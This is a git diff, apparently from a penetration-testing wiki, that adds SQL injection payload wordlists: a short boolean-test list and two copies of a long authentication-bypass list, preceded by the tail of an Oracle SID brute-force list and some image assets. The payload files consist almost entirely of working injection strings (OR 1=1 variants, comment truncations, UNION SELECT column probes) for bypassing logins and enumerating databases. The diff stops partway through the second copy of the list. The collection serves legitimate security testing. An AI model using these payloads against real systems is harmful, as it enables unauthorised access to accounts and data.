+PORA9208 +PRD +PRITXI +PROD +PROD0 +PROD1 +PROD10 +PROD10G +PROD11 +PROD11G +PROD2 +PROD3 +PROD4 +PROD5 +PROD6 +PROD7 +PROD8 +PROD8I +PROD9 +PROD920 +PROD9I +PROG10 +QM +QS +RAB1 +RAC +RAC1 +RAC2 +RAC3 +RAC4 +RDB +RDS +RECV +REP +REP0 +REP1 +REP2 +REP3 +REP4 +REP5 +REP6 +REP7 +REP8 +REP9 +REPO +REPO0 +REPO1 +REPO2 +REPO3 +REPO4 +REPO5 +REPO6 +REPO7 +REPO8 +REPO9 +REPOS +REPOS0 +REPOS1 +REPOS2 +REPOS3 +REPOS4 +REPOS5 +REPOS6 +REPOS7 +REPOS8 +REPOS9 +REPSCAN +RIPPROD +RITCTL +RITDEV +RITPROD +RITQA +RITTRN +RITTST +SA0 +SA1 +SA2 +SA3 +SA4 +SA5 +SA6 +SA7 +SA8 +SA9 +SAA +SAB +SAC +SAD +SAE +SAF +SAG +SAH +SAI +SAJ +SAK +SAL +SALES +SAM +SAMPLE +SAN +SANIPSP +SAO +SAP +SAP0 +SAP1 +SAP2 +SAP3 +SAP4 +SAP5 +SAP6 +SAP7 +SAP8 +SAP9 +SAPHR +SAQ +SAR +SAS +SAT +SAU +SAV +SAW +SAX +SAY +SAZ +SDB +SENTRIGO +SES +SGNT +SID0 +SID1 +SID2 +SID3 +SID4 +SID5 +SID6 +SID7 +SID8 +SID9 +SIP +SOL10 +SOL11 +SOL9 +STAG1 +STAG2 +T1 +T10 +T101 +T102 +T2 +T3 +T4 +T7 +T71 +T72 +T73 +T8 +T80 +T81 +T82 +T9 +T91 +T92 +TEST +TEST10G +TEST11G +TEST9I +TESTORCL +THUMPER +TRC28 +TRIUMF +TSH1 +TSM +TST +TST0 +TST1 +TST2 +TST3 +TST4 +TST5 +TST6 +TST7 +TST8 +TST9 +TYCP +UNIX101 +UNIX1011 +UNIX1012 +UNIX1013 +UNIX1014 +UNIX1015 +UNIX102 +UNIX1021 +UNIX1022 +UNIX1023 +UNIX1024 +UNIX1025 +UNIX817 +UNIX8171 +UNIX8172 +UNIX8173 +UNIX8174 +UNIX901 +UNIX902 +UNIX9021 +UNIX9022 +UNIX9023 +UNIX9024 +UNIX9025 +UNIX9026 +UNIX9027 +UNIX9028 +V713 +VENOM +VENU +VISTA +W101 +W1011 +W1012 +W1013 +W1014 +W1015 +W102 +W1021 +W1022 +W1023 +W1024 +W1025 +W111 +W11102 +W11106 +W11107 +W112 +W11201 +W817 +W8171 +W8172 +W8173 +W8174 +W901 +W902 +W9021 +W9022 +W9023 +W9024 +W9025 +W9026 +W9027 +W9028 +WEB +WEB1 +WEB10 +WEB2 +WEB3 +WEB4 +WEB5 +WEB6 +WEB7 +WEB8 +WEB9 +WEBDEV +WG73 +WG73 +WIN101 +WIN1011 +WIN1012 +WIN1013 +WIN1014 +WIN1015 +WIN102 +WIN1021 +WIN1022 +WIN1023 +WIN1024 +WIN1025 +WIN11 +WIN111 +WIN11106 +WIN11107 +WIN112 +WIN11201 +WIN11202 +WIN7 +WIN817 +WIN8171 +WIN8172 +WIN8173 +WIN8174 +WIN901 +WIN902 +WIN9021 +WIN9022 +WIN9023 +WIN9024 +WIN9025 +WIN9026 +WIN9027 +WIN9028 +WINDOWS101 +WINDOWS1011 +WINDOWS1012 +WINDOWS1013 +WINDOWS1014 +WINDOWS1015 +WINDOWS102 +WINDOWS1021 +WINDOWS1022 +WINDOWS1023 +WINDOWS1024 +WINDOWS1025 +WINDOWS11 +WINDOWS111 +WINDOWS11106 +WINDOWS11107 +WINDOWS112 +WINDOWS11201 +WINDOWS11202 +WINDOWS817 +WINDOWS8171 +WINDOWS8172 +WINDOWS8173 +WINDOWS8174 +WINDOWS901 +WINDOWS902 +WINDOWS9021 +WINDOWS9022 +WINDOWS9023 +WINDOWS9024 +WINDOWS9025 +WINDOWS9026 +WINDOWS9027 +WINDOWS9028 +XE +XEXDB +XE_XPT diff --git a/.gitbook/assets/smbexec_prompt.png b/.gitbook/assets/smbexec_prompt.png new file mode 100644 index 00000000000..88945a8645b Binary files /dev/null and b/.gitbook/assets/smbexec_prompt.png differ diff --git a/.gitbook/assets/smbexec_service.png b/.gitbook/assets/smbexec_service.png new file mode 100644 index 00000000000..674088bd5cd Binary files /dev/null and b/.gitbook/assets/smbexec_service.png differ diff --git a/src/images/SNMP_OID_MIB_Tree (1).png b/.gitbook/assets/snmp_oid_mib_tree.png similarity index 100% rename from src/images/SNMP_OID_MIB_Tree (1).png rename to .gitbook/assets/snmp_oid_mib_tree.png diff --git a/.gitbook/assets/sqli-1.txt b/.gitbook/assets/sqli-1.txt new file mode 100644 index 00000000000..3952738e252 --- /dev/null +++ b/.gitbook/assets/sqli-1.txt @@ -0,0 +1,49 @@ +true +1 +1>0 +2-1 +0+1 +1*1 +1%2 +1=1 +1 & 1 +1&1 +1 && 2 +1&&2 +-1 || 1 +|1||1 +-1 oR 1 +1 aND 1 +1 LikE 1 +(1)oR(1) +(1)aND(1) +(1)LikE(1) +-1/**/oR/**/1 +1/**/aND/**/1 +1/**/LikE/**/1 +1' +1'>'0 +2'-'1 +0'+'1 +1'*'1 +1'%'2 +1'='1 +1'&'1 +1'&&'2 +-1'||'1 +-1'oR'1 +1'aND'1 +1'LikE'1 +1" +1">"0 +2"-"1 +0"+"1 +1"*"1 +1"%"2 +1"="1 +1"&"1 +1"&&"2 +-1"||"1 +-1"oR"1 +1"aND"1 +1"LikE"1 \ No newline at end of file diff --git a/.gitbook/assets/sqli-authbypass-big.txt b/.gitbook/assets/sqli-authbypass-big.txt new file mode 100644 index 00000000000..5a03da57f0f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big.txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/.gitbook/assets/sqli-authbypass-long.txt b/.gitbook/assets/sqli-authbypass-long.txt new file mode 100644 index 00000000000..5a03da57f0f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-long.txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" 